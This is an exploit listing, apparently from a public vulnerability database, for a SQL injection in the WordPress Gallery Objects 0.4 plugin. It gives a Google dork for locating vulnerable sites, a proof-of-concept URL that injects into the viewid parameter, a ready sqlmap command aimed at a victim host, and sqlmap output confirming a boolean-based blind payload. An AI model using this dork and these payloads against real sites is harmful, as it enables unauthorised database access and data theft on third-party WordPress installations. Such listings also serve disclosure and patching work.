Wordpress Gallery Objects Version 0.4 SQL Injection vulnerability

2019.08.30
ir Amirmomeni (IR) ir
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/admin-ajax.php?action=go_view_object

# Wordpress Gallery Objects Version 0.4 SQL Injection vulnerability Exploit Author : AmirMomeni Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ===================================================# Dork Google : inurl:/admin-ajax.php?action=go_view_object Poc via Browser: http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html sqlmap : sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid --- Place: GET Parameter: viewid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html --- =====================================================#


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top